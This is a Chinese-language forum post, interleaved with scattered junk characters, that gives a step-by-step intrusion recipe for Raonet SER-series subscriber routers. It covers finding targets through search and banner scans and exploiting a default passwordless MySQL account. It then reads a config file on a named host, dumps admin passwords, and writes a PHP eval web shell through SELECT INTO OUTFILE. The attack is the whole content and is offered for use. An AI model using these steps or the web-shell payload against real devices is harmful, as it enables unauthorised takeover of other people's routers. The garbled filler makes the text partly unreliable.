寻找存在漏洞的路由器方法:8 j( _4 p2 q1 R+ Z d8 A L
2 ], J3 d4 f1 o: K4 v1:google搜索'Raonet Subscriber Ethernet Router'9 k# [; c- o( t4 ]# n- L
) T! G* R: Q- h3 \) M; O! p
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
/ v! F- C- e$ R! X! t4 F) } M$ v
, ?' w0 o( ~0 S1 x: b+ F3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
9 @6 _& r4 j9 H) i# B6 g8 w! G5 @2 S2 u* }4 k. O, r2 ^7 |# X
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成...... g7 \- I9 [9 _
- d6 H" [( c! j' v9 E8 _6 P* {# Q ! ]% [1 z" d6 {5 o7 p9 P) y; S
! ?* m1 W& L" k4 Q0 ?4 N9 N入侵步骤: O/ S4 V0 P. ]; }5 ^7 W
! E' [( z1 S1 ^$ S; Z* k1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
; }, t7 F# c1 G2 @" _
9 [+ d- a" S; O* \8 e! p+ q2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc, I9 Y/ ~5 u- j/ d7 k$ \! P! r' \' _
3:得到密码后连接,查看GUI管理密码:
' L/ W4 d1 w. J5 f. i4 \use ser_5009 P4 N- A# h* E
select id,passwd from user;' J: o, I7 W% B6 _
4:通过数据库写入webshell,执行命令:
( Y6 ~7 c# k$ Y/ Huse mysql;% C3 \, H* |1 l5 C" s
create table ok(cmd TEXT);3 v# {+ u+ R/ |9 p; {4 {7 K h
insert into ok values("<?php @eval($_POST[cmd])?>");
5 `7 X1 q' c" G; N) bselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
% D3 O, O U( m$ O4 f; l% e$ cdrop table ok;" x/ o8 ]( C# [* T, I$ H
/ w! `# U4 ?" m5 v1 a# `. P5:连接后门shell.php : K8 `- P/ @2 C6 g5 b
# ~$ ~9 S! a; I% m
6. 搞定!; N) m# U% u3 |- e- L. j) h) t
" k; a* H" n- B* n6 P& p: x |